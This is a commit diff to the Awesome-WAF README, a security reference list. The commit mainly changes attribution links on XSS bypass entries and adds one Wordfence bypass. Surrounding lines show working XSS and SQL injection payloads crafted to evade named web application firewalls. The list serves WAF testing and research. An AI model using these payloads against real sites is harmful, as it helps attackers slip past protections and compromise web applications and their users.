Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2025-01-27 14:57:21 -05:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/0xinfection/awesome-waf

Browse Source
This commit is contained in:
0xInfection 2019-04-07 18:16:28 +05:30
commit 0beda39073
1 changed files with 10 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
README.md
View File

@ -2513,7 +2513,7 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co
Host: favoritewaf.com Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
``` ```
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) - XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
``` ```
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
``` ```
@ -2569,13 +2569,13 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
``` ```
<--`<img/src=` onerror=confirm``> --!> <--`<img/src=` onerror=confirm``> --!>
``` ```
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) - XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
``` ```
<a"/onclick=(confirm)()>click <a"/onclick=(confirm)()>click
``` ```
### Comodo ### Comodo
- XSS Bypass by [@s0md3v](https://twiiter.com/s0md3v) - XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
``` ```
<d3v/onauxclick=(((confirm)))``>click <d3v/onauxclick=(((confirm)))``>click
``` ```
@ -2769,7 +2769,7 @@ stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS
``` ```
?"></script><base%20c%3D=href%3Dhttps:\mysite> ?"></script><base%20c%3D=href%3Dhttps:\mysite>
``` ```
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) - XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
``` ```
<d3v/onauxclick=[2].some(confirm)>click <d3v/onauxclick=[2].some(confirm)>click
``` ```
@ -2819,7 +2819,11 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<scrip
``` ```
### Wordfence ### Wordfence
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) (>= v7.1) - XSS Bypass by [@brutelogic](https://twitter.com/brutelogic)
```
<a href=javas&#99;ript:alert(1)>
```
- XSS Bypass - [Source](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Bypassing%20WAF%20XSS%20Detection%20Mechanisms.pdf)
``` ```
<a/href=javascript&colon;alert()>click <a/href=javascript&colon;alert()>click
``` ```
@ -2886,7 +2890,7 @@ python identYwaf.py --delay=2 --proxy=<proxy> <target>
### Testing: ### Testing:
- [WAFBench](https://github.com/microsoft/wafbench) - A WAF performance testing suite by [Microsoft](https://github.com/microsoft). - [WAFBench](https://github.com/microsoft/wafbench) - A WAF performance testing suite by [Microsoft](https://github.com/microsoft).
- [WAF Testing Framework](https://www.imperva.com/lg/lgw_trial.asp?pid=483) - A free WAF testing tool by [Imperva](https://imperva.com). - [WAF Testing Framework](https://www.imperva.com/lg/lgw_trial.asp?pid=483) - A WAF testing tool by [Imperva](https://imperva.com).
### Evasion: ### Evasion:
__1. Evading WAFs with [SQLMap Tamper Scripts](https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3)__: __1. Evading WAFs with [SQLMap Tamper Scripts](https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3)__: